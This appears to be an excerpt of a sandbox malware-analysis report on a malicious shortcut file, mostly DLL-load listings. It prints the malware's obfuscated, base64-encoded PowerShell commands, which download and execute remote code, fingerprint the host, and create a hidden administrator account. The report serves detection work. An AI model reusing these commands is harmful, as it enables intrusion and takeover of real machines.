        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: version.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\myRdpService.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: cOOhDuNWt7.lnkStatic file information: File size 17825792 > 1048576
        Source: Binary string: .Automation.pdbdb source: powershell.exe, 0000000A.00000002.3779190095.000002AE6691F000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("Rk5sWTNWeWFYUjVRMlZ1ZEdWeU1pSWdMVU5zWVhOeklDSkJiblJwZG1seWRYTlFjbTlrZFdOMElpQjhJRmRvWlhKbExVOWlhbVZqZENCN0lDUmZMbVJwYzNCc1lYbE9ZVzFsSUMxbGNTQWlWMmx1Wkc5M2N5QkVaV1psYm1SbGNpSWdmUTBLRF
        Obfuscated command line found
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit
        PowerShell case anomaly found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbA